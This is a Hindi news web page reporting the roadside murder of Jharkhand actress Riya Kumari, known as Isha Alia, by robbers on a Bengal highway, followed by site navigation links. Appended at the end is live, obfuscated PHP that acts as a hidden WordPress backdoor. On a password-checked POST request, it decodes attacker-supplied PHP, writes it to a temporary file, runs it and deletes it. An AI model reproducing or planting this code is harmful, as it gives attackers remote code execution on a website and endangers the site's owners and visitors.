कोलकाता क्राइम: तुनिषा के बाद एक और एक्ट्रेस की मौत, अभिनेत्री ईशा आलिया की हत्या, लूटपाट कर बदमाशों ने मारी गोली

Uttarakhand Press News 29 December 2022: कोलकाता: टीवी एक्ट्रेस तुनिषा शर्मा और सोशल मीडिया इन्फ्लुएंसर लीना नागंवशी के सुसाइड के बाद अभिनय जगत से एक और दिल दहला देने वाली खबर सामने आई है. झारखंड की एक्ट्रेस रिया कुमारी की बदमाशों ने गोली मारकर हत्या कर दी है. यह घटना बंगाल हाईवे पर उस वक्त घटी, जब रिया कार में अपने पति संग जा रही थीं. तभी कुछ बदमाश ने उनके पति को लूटने की कोशिश की और इस बीच रिया ने पति को बचाने की कोशिश में अपनी जान दे दी. इस हादसे के दौरान रिया के पति प्रकाश कुमार और उनकी ढाई साल की बेटी भी मौजूद थी. रिया पॉपुलर यूट्यूबर और लोकल सीरियल ‘वह चलचित्र’ से मशहूर थीं.

कब-कहां और कैसे हुआ यह सब?

मीडिया रिपोर्ट्स के मुताबिक, बीते बुधवार की सुबह 6 बजे के करीब बग्नान के महेश खेड़ा ब्रिज के पास गाड़ी रोकने पर वहां कुछ बदमाशों ने उन्हें घेर लिया और छीना-झपटी शुरू कर दी. जब रिया ने बदमाशों को डटकर रोकने की कोशिश की, तो हथियारबंद बदमाशों ने रिया पर बिना सोचे समझे गोली चला दी. रिया की वहीं मौके पर मौत हो गई. इतना कुछ होने पर रिया के पति ने आनन-फानन में गाड़ी सीधे राजापुर थाना पिरतल्ला पहुंचकर स्थानीय पुलिस को पूरी घटना के बारे में बताया. पुलिस ने एक्ट्रेस के शव को बरामद कर बदमाशों की तलाश शूरू कर दी है.

‘ईशा आलिया’ के नाम से मशहूर थी एक्ट्रेस

रिया कुमारी की मौत से सोशल मीडिया पर हंगमा मच गया है. सोशल मीडिया पर एक्ट्रेस के फैंस उनकी मौत पर शोक जता दुख प्रकट कर रहे हैं. बता दें, रिया रीजनल सिनेमा में ईशा आलिया के नाम से मशहूर थीं. फिल्मों में इसी नाम से तरक्की कर रही थीं.

रिया कुमारी का करियर

जानकर हैरानी होगी कि टीवी एक्ट्रेस तुनिषा शर्मा 20 साल, सोशल मीडिया स्टार लीना नागवंशी 22 साल और अब रिया कुमारी की मौत भी 22 साल की उम्र में हुई है. बीते पांच दिन के अंदर देश ने तीन फीमेल कलाकारों को खो दिया है. रिया ने महज 22 साल की उम्र में ही अपनी पहचान बना ली थी. रिया अपने बेहतरीन डांस और एक्टिंग स्किल के लिए जानी जाती थीं. ऐसे में अचानक उनकी मौत की खबर से परिजन और उनके फैंस सदमे में आ गए हैं.

Read Previous

Uttarakhand Press News: हल्द्वानी: अब 10 से चलेगा बुलडोजर, सबसे पहले कटेगी बिजली..7 हजार पुलिसकर्मी तैनात

Read Next

शाहरुख खान की ‘पठान’ के ‘बेशरम रंग’ गाने में होंगे बदलाव, सेंसर बोर्ड ने निर्माताओं को दिये निर्देश, CBFC चेयरमैन प्रसून जोशी

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}